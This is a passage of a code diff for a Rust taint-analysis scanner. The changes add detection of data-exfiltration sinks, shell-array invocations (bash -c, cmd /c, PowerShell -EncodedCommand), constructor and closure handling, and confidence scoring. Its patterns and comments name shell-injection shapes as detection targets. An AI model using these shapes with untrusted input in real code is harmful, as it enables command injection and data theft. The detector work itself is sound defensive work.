"cmd.exe"); + let is_powershell = matches!(leaf, "powershell" | "powershell.exe" | "pwsh" | "pwsh.exe"); + if is_cmd { + return matches!(flag, "/c" | "/C" | "/k" | "/K"); + } + if is_powershell { + return matches!( + flag, + "-c" | "-Command" | "-command" | "-EncodedCommand" | "-encodedcommand" + ); + } + // POSIX shells. + flag == "-c" +} diff --git a/src/cfg/mod.rs b/src/cfg/mod.rs index 5e9e0743..428e4dd2 100644 --- a/src/cfg/mod.rs +++ b/src/cfg/mod.rs @@ -52,10 +52,11 @@ use literals::has_sql_placeholders; use literals::{ arg0_kind_and_interpolation, call_ident_of, def_use, detect_go_replace_call_sanitizer, detect_rust_replace_chain_sanitizer, extract_arg_callees, extract_arg_string_literals, - extract_arg_uses, extract_const_keyword_arg, extract_const_string_arg, - extract_destination_field_idents, extract_kwargs, extract_literal_rhs, find_call_node, - find_call_node_deep, find_chained_inner_call, has_keyword_arg, has_only_literal_args, - is_parameterized_query_call, java_chain_arg0_kind_for_method, js_chain_arg0_kind_for_method, + extract_arg_uses, extract_const_keyword_arg, extract_const_macro_arg, extract_const_string_arg, + extract_destination_field_pairs, extract_destination_kwarg_pairs, extract_kwargs, + extract_literal_rhs, extract_shell_array_payload_idents, find_call_node, find_call_node_deep, + find_chained_inner_call, has_keyword_arg, has_only_literal_args, is_parameterized_query_call, + java_chain_arg0_kind_for_method, js_chain_arg0_kind_for_method, js_chain_outer_method_for_inner, ruby_chain_arg0_for_method, walk_chain_inner_call_args, }; use params::{ @@ -312,6 +313,15 @@ pub struct CallMeta { /// [`Self::destination_uses`]). #[serde(default)] pub gate_filters: Vec, + /// True when this call expression is a constructor invocation + /// (e.g. JS/TS `new Stripe(key)`, PHP `new PDO(...)`). The SSA Call + /// transfer uses this to narrow the constructed value's caps: a wrapper + /// object instance is structurally not a path string, format string, + /// URL component, or JSON input, so out-of-process side-effect bits + /// (FILE_IO, FMT_STRING, URL_ENCODE, JSON_PARSE) on the arguments + /// must not survive into the constructed object. + #[serde(default)] + pub is_constructor: bool, } /// One gate's contribution at a call site whose callee matches multiple @@ -329,6 +339,15 @@ pub struct GateFilter { /// considers SSA values whose `var_name` matches one of `names` (object- /// literal destination fields lifted at CFG time). `None` ⇒ whole arg. pub destination_uses: Option>, + /// Parallel to [`Self::destination_uses`]: for each entry, the + /// destination object-literal field name (e.g. `"body"`, `"headers"`, + /// `"json"`) where the corresponding ident was bound. Empty when + /// `destination_uses` is `None` or the gate had no + /// `object_destination_fields` configured. Consumed by diag rendering + /// to embed the destination field in `DATA_EXFIL` messages and SARIF + /// `properties.data_exfil_field`. + #[serde(default, skip_serializing_if = "Vec::is_empty")] + pub destination_fields: Vec, } /// Taint-classification and variable-flow metadata. @@ -450,6 +469,13 @@ pub struct NodeInfo { /// up the field's declared `TypeKind`. Strictly additive, when /// `None`, the legacy copy-prop semantics apply. pub member_field: Option, + /// True when this assignment / declaration's RHS is a function or + /// lambda literal (`obj.handler = (e) => {...}`, `let f = function(){}`). + /// State analysis uses this to suppress resource-ownership transfer: + /// storing a function reference into a property does not move the + /// resources captured by the closure body, so the lifecycle of those + /// captures must remain unchanged on the assignment node. + pub rhs_is_function_literal: bool, } impl NodeInfo { @@ -1564,6 +1590,92 @@ pub(super) fn push_node<'a>( let extra = analysis_rules.map(|r| r.extra_labels.as_slice()); let mut labels = classify_all(lang, &text, extra); + // Rust chain-text classification. The default `text` for a Rust + // CallMethod is `{root_receiver}.{method}`, where `root_receiver` + // is the leftmost identifier after walking through every nested + // call/method receiver. That convention loses the intermediate + // chain methods, so a body-binding chain like + // `Client::post(url).body(payload).send()` reduces to + // `Client::post.send` and rules keyed on `body.send` / + // `RequestBuilder.body` cannot fire. + // + // Reclassify against the call-AST's source text (with paren groups + // stripped) so suffix matchers covering chain shapes + // (`body.send`, `body_string`, `Request::builder.body`, ...) attach. + // Strictly additive: we union new labels with the existing ones, + // never override. Limited to Rust to avoid disturbing the other + // languages' chain conventions. + if lang == "rust" { + if let Some(cn) = find_call_node(ast, lang) { + if let Some(chain_raw) = text_of(cn, code) { + // Multi-line Rust chains (`Client::new()\n .post(url)\n + // .body(p)\n .send()`) preserve interior whitespace in + // the source slice, which would prevent suffix matchers + // like `body.send` from firing. Strip whitespace before + // normalizing paren groups, mirroring the same trick + // used by `find_chained_inner_call` for JS/TS chains. + let chain_compact: String = + chain_raw.chars().filter(|c| !c.is_whitespace()).collect(); + let chain_text = crate::labels::normalize_chained_call_for_classify(&chain_compact); + if chain_text != text { + let chain_labels = classify_all(lang, &chain_text, extra); + for l in chain_labels { + if !labels.contains(&l) { + labels.push(l); + } + } + } + // Also try classification against the chain with + // trailing identity methods peeled. Rust chains often + // end in `.unwrap()` / `.expect("...")` / `.await` / + // `.clone()` etc., which obscure the body-bind verb + // for suffix matchers. E.g. hyper's + // `Request::builder().method(..).uri(..).body(p).unwrap()` + // peels to `...body`, allowing a simpler `body` / + // `Request::builder.body` matcher to fire. + let peeled = crate::ssa::type_facts::peel_identity_suffix(&chain_text); + if peeled != chain_text && peeled != text { + let peeled_labels = classify_all(lang, &peeled, extra); + for l in peeled_labels { + if !labels.contains(&l) { + labels.push(l); + } + } + } + // Pattern synthesis: the hyper request-builder chain + // (`hyper::Request::builder().method(..).uri(..).body(p)`) + // can interleave `.method`, `.uri`, `.header`, `.version` + // etc. between `Request::builder` and the body-bind step. + // Suffix matchers can't span those, so synthesise a + // DATA_EXFIL sink whenever the chain begins with + // `Request::builder` and ends in a body-binding verb. + // Strictly additive: no labels are removed, only added, + // and the synthesis only fires when an explicit Sink + // hasn't already attached. + let chain_for_synth = if peeled != chain_text { + &peeled + } else { + &chain_text + }; + if !labels + .iter() + .any(|l| matches!(l, DataLabel::Sink(c) if c.contains(crate::labels::Cap::DATA_EXFIL))) + && (chain_for_synth.contains("Request::builder.") + || chain_for_synth.contains("hyper::Request::builder.")) + { + let last_seg = + chain_for_synth.rsplit('.').next().unwrap_or(chain_for_synth); + if matches!( + last_seg, + "body" | "body_mut" | "body_string" | "body_json" | "body_bytes" + ) { + labels.push(DataLabel::Sink(crate::labels::Cap::DATA_EXFIL)); + } + } + } + } + } + // If the outermost call didn't classify, try inner/nested calls. // E.g. `str(eval(expr))`, `str` is not a sink, but `eval` is. // When the callee is overridden, save the original for container ops @@ -1727,7 +1839,23 @@ pub(super) fn push_node<'a>( let mut sink_payload_args: Option> = None; let mut destination_uses: Option> = None; let mut gate_filters: Vec = Vec::new(); - if labels.is_empty() { + // Gates run when no flat `Sink` label is already present, OR when a + // matching gate restricts the payload-arg set on top of an existing flat + // sink. Source / Sanitizer labels are orthogonal — a callee like + // Python's `requests.post` is a `Source` for its response object AND a + // gated `Sink` for its URL/body argument positions; both should attach. + // + // Payload-arg refinement: when a flat sink matches a callee that ALSO + // has a gate entry restricting `payload_args`, the gate's `payload_args` + // are propagated to `sink_payload_args` so only those positions are + // taint-checked. Example: `execSync(cmd, { env: process.env })` matches + // the bare `execSync` flat `Sink(SHELL_ESCAPE)` AND the gate `=execSync` + // with `payload_args: &[0]`; without the refinement, the flat rule's + // implicit "all args" would flag `process.env` flowing into the options + // object's `env` field. The gate's labels themselves are deduped so a + // single capability never double-attributes. + let has_sink_label = labels.iter().any(|l| matches!(l, DataLabel::Sink(_))); + { let gate_call = call_ast.or_else(|| find_call_node_deep(ast, lang, 4)); if let Some(cn) = gate_call { let gate_callee_text = if call_ast.is_some() { @@ -1746,7 +1874,22 @@ pub(super) fn push_node<'a>( let matches = classify_gated_sink( lang, &gate_callee_text, - |idx| extract_const_string_arg(cn, idx, code), + |idx| { + extract_const_string_arg(cn, idx, code).or_else(|| { + // C/C++ preprocessor macros and PHP `define`d constants + // surface as identifier nodes, not string literals. + // Falling back to the macro-arg extractor for those + // languages lets gates like `curl_easy_setopt` / + // `curl_setopt` activate on a `CURLOPT_POSTFIELDS` + // ident match instead of firing conservatively on + // every positional arg. + if matches!(lang, "c" | "cpp" | "c++" | "php") { + extract_const_macro_arg(cn, idx, code) + } else { + None + } + }) + }, |kw| extract_const_keyword_arg(cn, kw, code), |kw| has_keyword_arg(cn, kw, code), ); @@ -1758,11 +1901,23 @@ pub(super) fn push_node<'a>( // * a `GateFilter` carrying that gate's specific // `(label_caps, payload_args, destination_uses)` so // the SSA sink scan can attribute taint per-cap. + // + // When a flat sink already matches, gate labels are deduped + // so the same capability isn't attributed twice (once flat, + // once gated). Their `payload_args` still flow into + // `sink_payload_args` so the gate's arg-position restriction + // applies on top of the flat sink. let mut union_payload: Vec = Vec::new(); for gm in &matches { - labels.push(gm.label); + if has_sink_label { + if !labels.contains(&gm.label) { + labels.push(gm.label); + } + } else { + labels.push(gm.label); + } - let payload_vec: Vec = + let mut payload_vec: Vec = if gm.payload_args == crate::labels::ALL_ARGS_PAYLOAD { // Dynamic-activation sentinel: every positional arg is // conservatively a payload. Expand using the actual @@ -1780,19 +1935,57 @@ pub(super) fn push_node<'a>( // checks to identifiers under those fields. Non-object // arg forms return `None` from the extractor and the gate // falls back to whole-arg positional filtering. + // + // The pair form preserves which object-literal field each + // ident was bound to (e.g. `body` vs `headers` vs `json`) + // so diag rendering can attribute `DATA_EXFIL` findings to + // a specific destination field. let mut dest_uses: Option> = None; + let mut dest_fields: Vec = Vec::new(); if !gm.object_destination_fields.is_empty() { + let mut all_pairs: Vec<(String, String)> = Vec::new(); + let mut had_object_match = false; for &pos in gm.payload_args { - if let Some(names) = extract_destination_field_idents( + if let Some(pairs) = extract_destination_field_pairs( cn, pos, gm.object_destination_fields, code, ) { - dest_uses = Some(names); + all_pairs.extend(pairs); + had_object_match = true; break; } } + + // Direct kwargs: languages where destination-bearing + // fields are passed as `keyword_argument` siblings of + // the positional args (Python `data=`, Ruby kwargs). + // SSA lowering folds kwarg idents into the implicit + // args group at index `arity`, so we expand + // `payload_vec` to include that position; the + // `destination_filter` then narrows to the kwarg + // ident's `var_name`. + let kwarg_pairs = + extract_destination_kwarg_pairs(cn, gm.object_destination_fields, code); + if !kwarg_pairs.is_empty() { + let arity = extract_arg_uses(cn, code).len(); + if !payload_vec.contains(&arity) { + payload_vec.push(arity); + } + for pair in kwarg_pairs { + if !all_pairs.iter().any(|(_, v)| v == &pair.1) { + all_pairs.push(pair); + } + } + } + + if had_object_match || !all_pairs.is_empty() { + let (fields, vars): (Vec, Vec) = + all_pairs.into_iter().unzip(); + dest_uses = Some(vars); + dest_fields = fields; + } } let label_caps = match gm.label { @@ -1809,6 +2002,7 @@ pub(super) fn push_node<'a>( label_caps, payload_args: payload_vec, destination_uses: dest_uses, + destination_fields: dest_fields, }); } if !union_payload.is_empty() { @@ -1826,6 +2020,65 @@ pub(super) fn push_node<'a>( } } + // ── Inline shell-array sink synthesis ──────────────────────────────── + // + // Recognise `[, "-c", ]` (and `cmd /c `) + // appearing as an argument to *any* call. The shell-array shape itself + // is the gate, regardless of callee, so this fires through user-defined + // wrappers like `execInContainer(id, ["bash", "-c", `echo ${tainted}`])` + // without needing per-wrapper summary annotations. Only fires for JS/TS + // because the array-literal grammar (`array` node) and shell-form usage + // are JS/TS conventions; other languages use different shapes for + // shell-exec wrappers. + // + // The inner array also covers Dockerode's + // `container.exec({Cmd: [shell, "-c", payload]})`: the helper looks + // inside object-literal args for shell-array values under any field. + // + // Existing FP carve-outs are preserved. `["ls", "-la"]` doesn't match + // (element 0 is not a known shell). `untaintedArrayVariable` doesn't + // match (variable, not literal). `execSync(cmd, { env: process.env })` + // doesn't match (string + object args, no shell-array literal). When + // the payload elements are constant strings the helper returns no + // match, so a literal `["bash", "-c", "ls -la"]` doesn't fire either. + if matches!(lang, "javascript" | "js" | "typescript" | "ts") { + if let Some(cn) = call_ast.or_else(|| find_call_node_deep(ast, lang, 4)) { + let shell_matches = extract_shell_array_payload_idents(cn, code); + if !shell_matches.is_empty() { + let shell_label = DataLabel::Sink(Cap::SHELL_ESCAPE); + let already_has_shell_sink = labels.iter().any(|l| match l { + DataLabel::Sink(c) => c.contains(Cap::SHELL_ESCAPE), + _ => false, + }); + if !already_has_shell_sink { + labels.push(shell_label); + } + + let mut union_payload: Vec = sink_payload_args.clone().unwrap_or_default(); + for sm in shell_matches { + if !union_payload.contains(&sm.arg_position) { + union_payload.push(sm.arg_position); + } + gate_filters.push(GateFilter { + label_caps: Cap::SHELL_ESCAPE, + payload_args: vec![sm.arg_position], + destination_uses: Some(sm.payload_idents), + destination_fields: Vec::new(), + }); + } + if !union_payload.is_empty() { + sink_payload_args = Some(union_payload); + } + // Legacy single-gate path: when this is the only gate filter, + // populate the top-level destination_uses too so the SSA + // fast-path stays consistent with the multi-gate behaviour. + if gate_filters.len() == 1 { + destination_uses = gate_filters[0].destination_uses.clone(); + } + } + } + } + // Pattern-based sanitizer synthesis: recognise a Rust // `param.replace(LIT, LIT)[.replace(LIT, LIT)]*` chain that provably strips // path-traversal or HTML metacharacters. The CFG collapses the whole @@ -2296,6 +2549,20 @@ pub(super) fn push_node<'a>( // just bloat every labeled Call node. let callee_span = inner_callee_span.or(inner_text_span).filter(|s| *s != span); + // Constructor detection: a `new X(...)` call carries different cap + // semantics than a plain function call. The SSA Call transfer uses + // this flag to narrow the constructed value's caps so out-of-process + // side-effect bits (FILE_IO, FMT_STRING, URL_ENCODE, JSON_PARSE) on + // the arguments don't survive into a wrapper-object instance. + // Recognised forms: + // * JS/TS `new_expression` + // * Java/C++ `object_creation_expression` + // * PHP `object_creation_expression` + let is_constructor = ast.kind() == "new_expression" + || ast.kind() == "object_creation_expression" + || call_ast + .is_some_and(|cn| matches!(cn.kind(), "new_expression" | "object_creation_expression")); + let idx = g.add_node(NodeInfo { kind, call: CallMeta { @@ -2311,6 +2578,7 @@ pub(super) fn push_node<'a>( arg_string_literals, destination_uses, gate_filters, + is_constructor, }, taint: TaintMeta { labels, @@ -2339,6 +2607,7 @@ pub(super) fn push_node<'a>( is_eq_with_const: detect_eq_with_const(ast, lang), is_numeric_length_access: detect_numeric_length_access(ast, lang, code), member_field: detect_member_field_assignment(ast, code), + rhs_is_function_literal: rhs_is_function_literal(ast, lang), }); debug!( @@ -2404,7 +2673,10 @@ fn rhs_is_function_literal(ast: Node, lang: &str) -> bool { if candidate.is_none() { // Walk one level into declarations whose direct child is the // declarator (variable_declaration → variable_declarator → - // value). + // value), or expression-statement wrappers whose direct child is + // an assignment_expression / assignment with a `right` field + // (JS `expression_statement > assignment_expression`, Python + // `expression_statement > assignment`). let mut cursor = ast.walk(); for c in ast.children(&mut cursor) { if matches!( @@ -2417,6 +2689,11 @@ fn rhs_is_function_literal(ast: Node, lang: &str) -> bool { if candidate.is_some() { break; } + } else if matches!(lookup(lang, c.kind()), Kind::Assignment) { + candidate = c.child_by_field_name("right"); + if candidate.is_some() { + break; + } } } } @@ -4417,7 +4694,23 @@ fn apply_promisify_labels( let Some(alias) = aliases.get(&callee) else { continue; }; - let wrapped_labels = classify_all(lang, &alias.wrapped, extra); + // Inherit both flat and gated labels from the wrapped callee. + // Gated sinks (e.g. `child_process.exec`) carry the same + // capability semantics as flat sinks, just with arg-position + // filtering at the call site; the promisify alias should + // surface the wrapped function's sink class regardless of + // which arm originally classified it. + let mut wrapped_labels: Vec = + classify_all(lang, &alias.wrapped, extra) + .into_iter() + .collect(); + for gm in + classify_gated_sink(lang, &alias.wrapped, |_| None, |_| None, |_| false).iter() + { + if !wrapped_labels.contains(&gm.label) { + wrapped_labels.push(gm.label); + } + } if wrapped_labels.is_empty() { continue; } diff --git a/src/cfg_analysis/guards.rs b/src/cfg_analysis/guards.rs index 672a5a11..260ca73b 100644 --- a/src/cfg_analysis/guards.rs +++ b/src/cfg_analysis/guards.rs @@ -678,12 +678,30 @@ fn find_guard_nodes(ctx: &AnalysisContext) -> Vec<(NodeIndex, Cap)> { if info.kind == StmtKind::If { if let Some(cond_text) = &info.condition_text { let kind = classify_condition(cond_text); + // For `AllowlistCheck`, also confirm a target identifier was + // extractable. When the receiver-method form carries a + // string-literal arg (`filePath.includes("/")`, + // `path.contains("..")`), `extract_allowlist_target` returns + // `None` because the argument isn't an identifier. Those + // shapes are presence-checks, not real allowlist tests against + // a collection variable, and shouldn't dominate every + // downstream sink as a structural guard with `Cap::all()`. + // `classify_condition` itself stays unchanged (an existing + // test locks in its broad return for the receiver-method form, + // and the SSA branch-narrowing layer reads the kind for its + // own purposes). + let allowlist_has_target = if kind == PredicateKind::AllowlistCheck { + crate::taint::path_state::classify_condition_with_target(cond_text) + .1 + .is_some() + } else { + true + }; if matches!( kind, - PredicateKind::AllowlistCheck - | PredicateKind::TypeCheck - | PredicateKind::ValidationCall - ) { + PredicateKind::TypeCheck | PredicateKind::ValidationCall, + ) || (kind == PredicateKind::AllowlistCheck && allowlist_has_target) + { result.push((idx, Cap::all())); } else if cond_indirect_validator_callee(info, ctx).is_some() { // Indirect-validator pattern: @@ -995,7 +1013,25 @@ impl CfgAnalysis for UnguardedSink { // is the only other operand. The simpler `is_all_args_constant` // check above rejects that mixed shape because it forbids real // parameters in operand position. - if !has_taint && ssa_all_sink_operands_const_or_param(ctx, *sink) { + // + // Exemption: shell-array gate filters. The + // `extract_shell_array_payload_idents` detector recognises + // `[, "-c", ]` arrays at any call site and emits a + // `Sink(SHELL_ESCAPE)` label with `destination_uses` narrowed to + // the payload-element idents. When the array shape itself is the + // gate, an unrelated reassign-to-const elsewhere in the body + // (`const flag = true; if (flag) {}`) does not erase the + // shell-exec intent — the construction of `[bash, -c, x]` is by + // itself the dangerous operation. Skip this suppression so the + // structural finding survives in closed-world contexts where no + // taint source has been resolved yet. + let has_shell_array_gate = sink_info.call.gate_filters.iter().any(|gf| { + gf.label_caps.contains(Cap::SHELL_ESCAPE) && gf.destination_uses.is_some() + }); + if !has_taint + && !has_shell_array_gate + && ssa_all_sink_operands_const_or_param(ctx, *sink) + { continue; } diff --git a/src/cfg_analysis/mod.rs b/src/cfg_analysis/mod.rs index 7f68f6a3..54630d1f 100644 --- a/src/cfg_analysis/mod.rs +++ b/src/cfg_analysis/mod.rs @@ -125,6 +125,13 @@ pub struct AnalysisContext<'a> { /// the function-declaration level, the gap only matters when the /// auth call has to live inside the body. pub auth_decorators: &'a [String], + /// Names of variables whose `.close()` / release calls live in a + /// nested closure body somewhere else in the file (e.g. + /// `socket.on("close", () => ws.close())`). ResourceMisuse uses this + /// to suppress `cfg-resource-leak` for handles whose cleanup happens + /// in a callback the per-body CFG can't observe. When `None`, no + /// closure-based suppression is applied. + pub closure_released_var_names: Option<&'a std::collections::HashSet>, } pub trait CfgAnalysis { diff --git a/src/cfg_analysis/resources.rs b/src/cfg_analysis/resources.rs index 3feffd0d..4071da39 100644 --- a/src/cfg_analysis/resources.rs +++ b/src/cfg_analysis/resources.rs @@ -442,6 +442,23 @@ impl CfgAnalysis for ResourceMisuse { if pair.resource_name == "mutex" && !has_explicit_lock_acquire(ctx, acquire) { continue; } + // Suppress when a sibling closure / event handler in + // this file releases the same variable. Common JS/TS + // shape: `const ws = new WebSocket(url); + // socket.on("close", () => ws.close())`. The release + // node lives in a nested body the per-body CFG can't + // see, so the structural "no release on this exit + // path" check fires erroneously. Match by acquired + // variable name; closure captures share the binding + // name with the outer handle. + if let Some(acq_var) = ctx.cfg[acquire].taint.defines.as_deref() + && ctx + .closure_released_var_names + .map(|s| s.contains(acq_var)) + .unwrap_or(false) + { + continue; + } let info = &ctx.cfg[acquire]; let callee_desc = info.call.callee.as_deref().unwrap_or("(acquire)"); diff --git a/src/cfg_analysis/tests.rs b/src/cfg_analysis/tests.rs index 852de09a..52676174 100644 --- a/src/cfg_analysis/tests.rs +++ b/src/cfg_analysis/tests.rs @@ -33,6 +33,7 @@ fn parse_and_analyse( body_const_facts: None, type_facts: None, auth_decorators: &[], + closure_released_var_names: None, }; analysis.run(&ctx) } @@ -61,6 +62,7 @@ fn parse_and_run_all(src: &[u8], lang_str: &str, ts_lang: Language) -> Vec( body_const_facts: facts.as_ref(), type_facts: facts.as_ref().map(|f| &f.type_facts), auth_decorators: &[], + closure_released_var_names: None, }; analysis.run(&ctx) } @@ -1225,6 +1229,7 @@ fn config_sanitizer_suppresses_unguarded_sink() { body_const_facts: None, type_facts: None, auth_decorators: &[], + closure_released_var_names: None, }; let findings = run_all(&ctx); @@ -1703,6 +1708,7 @@ fn cfg_only_no_taint_produces_low_severity() { body_const_facts: None, type_facts: None, auth_decorators: &[], + closure_released_var_names: None, }; let findings = guards::UnguardedSink.run(&ctx); diff --git a/src/commands/mod.rs b/src/commands/mod.rs index cfc826e9..18d50749 100644 --- a/src/commands/mod.rs +++ b/src/commands/mod.rs @@ -32,6 +32,7 @@ pub fn handle_command( ); } let _ = crate::utils::analysis_options::install(config.analysis.engine); + let _ = crate::utils::detector_options::install(config.detectors.clone()); }; match command { @@ -293,6 +294,9 @@ pub fn handle_command( "analysis-engine runtime already installed; CLI engine flags ignored" ); } + // Detector knobs (currently `[detectors.data_exfil]`) are + // resolved straight from config; no CLI overrides yet. + let _ = crate::utils::detector_options::install(config.detectors.clone()); // ── --explain-engine: print resolved config and exit ──────── if explain_engine { diff --git a/src/constraint/domain.rs b/src/constraint/domain.rs index 342c3897..7fb6a937 100644 --- a/src/constraint/domain.rs +++ b/src/constraint/domain.rs @@ -184,6 +184,7 @@ fn type_kind_index(kind: &TypeKind) -> u32 { TypeKind::Url => 10, TypeKind::HttpClient => 11, TypeKind::LocalCollection => 12, + TypeKind::RequestBuilder => 13, // the analysis DTO types carry per-field structural info that the // bitset domain can't represent. Collapse to Unknown so callers // still see "any type possible" rather than crashing on an @@ -208,6 +209,7 @@ fn type_kind_from_index(idx: u32) -> Option { 10 => Some(TypeKind::Url), 11 => Some(TypeKind::HttpClient), 12 => Some(TypeKind::LocalCollection), + 13 => Some(TypeKind::RequestBuilder), _ => None, } } diff --git a/src/constraint/lower.rs b/src/constraint/lower.rs index 2115deb6..d2cc0de3 100644 --- a/src/constraint/lower.rs +++ b/src/constraint/lower.rs @@ -610,6 +610,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/database.rs b/src/database.rs index 4addac12..78afc1e0 100644 --- a/src/database.rs +++ b/src/database.rs @@ -2516,6 +2516,7 @@ fn ssa_summaries_round_trip() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ), ( @@ -2550,6 +2551,7 @@ fn ssa_summaries_round_trip() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ), ]; @@ -2722,6 +2724,7 @@ fn ssa_summaries_hash_rescan_replaces_stale() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )]; idx.replace_ssa_summaries_for_file(&f, &hash_v1, &sums_v1) @@ -2758,6 +2761,7 @@ fn ssa_summaries_hash_rescan_replaces_stale() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )]; idx.replace_ssa_summaries_for_file(&f, &hash_v2, &sums_v2) @@ -2815,6 +2819,7 @@ fn clear_drops_ssa_summaries_table() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )]; idx.replace_ssa_summaries_for_file(&f, &hash, &sums) @@ -2871,6 +2876,7 @@ fn make_test_callee_body( exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::new(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }, opt: crate::ssa::OptimizeResult { const_values: std::collections::HashMap::new(), @@ -3086,6 +3092,7 @@ fn make_test_ssa_summary() -> crate::summary::ssa_summary::SsaFuncSummary { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], } } @@ -3847,3 +3854,59 @@ fn ssa_summaries_pre_phase5_blob_decodes_with_empty_field_points_to() { "missing field_points_to must default to empty", ); } + +/// Pre-`param_to_gate_filters` blob compatibility: a summary serialised +/// before this field existed deserialises with the empty default. +/// `#[serde(default)]` on the field means old SQLite blobs round-trip +/// without a schema migration, the new field is stored inside the JSON +/// `summary` column so SQL-level columns are unchanged. +#[test] +fn ssa_summaries_pre_gate_filters_blob_decodes_with_empty_param_to_gate_filters() { + use crate::summary::ssa_summary::SsaFuncSummary; + + // Hand-craft JSON without the `param_to_gate_filters` key. + let pre_gate_filters_json = r#"{ + "param_to_return": [], + "param_to_sink": [], + "source_caps": 0, + "param_to_sink_param": [], + "param_container_to_return": [], + "param_to_container_store": [], + "return_type": null, + "return_abstract": null, + "source_to_callback": [], + "receiver_to_return": null, + "receiver_to_sink": 0, + "abstract_transfer": [], + "param_return_paths": [], + "return_path_facts": [], + "typed_call_receivers": [] + }"#; + let sum: SsaFuncSummary = serde_json::from_str(pre_gate_filters_json).unwrap(); + assert!( + sum.param_to_gate_filters.is_empty(), + "missing param_to_gate_filters must default to empty", + ); +} + +/// Round-trip: a summary with a populated `param_to_gate_filters` +/// survives JSON serialise + deserialise, including the per-position +/// cap-mask values needed to preserve SSRF-vs-DATA_EXFIL splits across +/// the function-summary boundary. +#[test] +fn ssa_summaries_param_to_gate_filters_round_trip() { + use crate::labels::Cap; + use crate::summary::ssa_summary::SsaFuncSummary; + + let mut sum = SsaFuncSummary::default(); + sum.param_to_gate_filters.push((0, Cap::SSRF)); + sum.param_to_gate_filters.push((1, Cap::DATA_EXFIL)); + + let json = serde_json::to_string(&sum).expect("serialize"); + let restored: SsaFuncSummary = serde_json::from_str(&json).expect("deserialize"); + assert_eq!( + restored.param_to_gate_filters, + vec![(0, Cap::SSRF), (1, Cap::DATA_EXFIL)], + "per-position cap masks must round-trip exactly", + ); +} diff --git a/src/evidence.rs b/src/evidence.rs index 6f16f5c7..e7208e7c 100644 --- a/src/evidence.rs +++ b/src/evidence.rs @@ -218,6 +218,14 @@ pub struct Evidence { /// under-budget findings and skipped during serialization in that case. #[serde(default, skip_serializing_if = "smallvec::SmallVec::is_empty")] pub engine_notes: smallvec::SmallVec<[crate::engine_notes::EngineNote; 2]>, + + /// For `Cap::DATA_EXFIL` findings, the destination object-literal field + /// the tainted value reached (e.g. `"body"`, `"headers"`, `"json"`). + /// `None` for non-exfil findings, for exfil findings whose payload arg + /// was not an object literal, or when the sink was resolved through a + /// summary path that did not preserve destination metadata. + #[serde(default, skip_serializing_if = "Option::is_none")] + pub data_exfil_field: Option, } fn is_zero_u16(v: &u16) -> bool { @@ -301,7 +309,15 @@ pub fn compute_confidence(diag: &Diag) -> Confidence { let id = &diag.id; - let base = if id.starts_with("taint-") { + let base = if id.starts_with("taint-data-exfiltration") { + // DATA_EXFIL is calibrated independently from the generic taint path: + // the value at risk is the leak of an *already-sensitive* source, not + // the construction of an attacker payload, so the points-based scoring + // tuned for code-exec / SSRF / SQLi over-credits these findings. Route + // to a narrower decision tree that asks "did we corroborate a real + // string body leaving the process?" instead. + compute_data_exfil_confidence(diag) + } else if id.starts_with("taint-") { compute_taint_confidence(diag) } else if id.starts_with("state-") { match id.as_str() { @@ -458,13 +474,71 @@ fn compute_taint_confidence(diag: &Diag) -> Confidence { } } +/// Confidence routing for `taint-data-exfiltration` findings. +/// +/// The generic taint scorer ranks DATA_EXFIL too aggressively: a Sensitive +/// source plus a sink call is enough to push it into the Medium/High band, +/// but the leak class needs corroboration that a real string body actually +/// leaves the process (otherwise we surface every `fetch(..., {body: x})` +/// where `x` happens to be Sensitive-tagged). This routing is deliberately +/// capped at Medium and only fires Medium when the symbolic execution +/// verdict confirms the path (abstract interpretation participates only as +/// a sink-suppression filter inside SSA taint and does not surface a +/// separate verdict here). +/// +/// Routing: +/// * Source < Sensitive → Low (caller already strips DATA_EXFIL for +/// Plain sources, but defensively floor here). +/// * Symbolic verdict `Confirmed` → Medium (symex produced a witness +/// that a tainted string reaches the body argument). +/// * Symbolic verdict `Inconclusive` / `NotAttempted` / no symbolic +/// analysis → Low (instruction's "Inconclusive" tier; the `Confidence` +/// enum has no separate Inconclusive variant so it floors to Low). +/// * Symbolic verdict `Infeasible` → Low (path proven dead). +/// +/// After routing, a `path_validated` guard on the diag drops the result +/// one tier (Medium → Low; Low stays Low) and `apply_engine_notes_cap` +/// applies the standard engine-notes cap. +fn compute_data_exfil_confidence(diag: &Diag) -> Confidence { + let ev = match &diag.evidence { + Some(e) => e, + None => return Confidence::Low, + }; + + let is_sensitive = ev + .source_kind + .map(|k| k.sensitivity() >= crate::labels::Sensitivity::Sensitive) + .unwrap_or(false); + if !is_sensitive { + return Confidence::Low; + } + + let mut base = match ev.symbolic.as_ref().map(|s| s.verdict) { + Some(Verdict::Confirmed) => Confidence::Medium, + Some(Verdict::Infeasible) => Confidence::Low, + Some(Verdict::Inconclusive) | Some(Verdict::NotAttempted) | None => Confidence::Low, + }; + + // Guarded flow: drop a tier. A validation predicate on the path means + // the leak may be unreachable in practice, so the corroborated witness + // is downgraded one step (Medium → Low; Low stays Low). + if diag.path_validated && base > Confidence::Low { + base = Confidence::Low; + } + + apply_engine_notes_cap(diag, base) +} + /// Score a structured `SourceKind` value. /// /// UserInput=+3, EnvironmentConfig=+2, Unknown/FileSystem=+1, Database/CaughtException=0. fn structured_source_kind_score(kind: crate::labels::SourceKind) -> i32 { use crate::labels::SourceKind; match kind { - SourceKind::UserInput => 3, + // Cookie / Header carry auth material, score them at the same + // ranking weight as direct user input rather than the lower + // FileSystem/Database tiers. + SourceKind::UserInput | SourceKind::Cookie | SourceKind::Header => 3, SourceKind::EnvironmentConfig 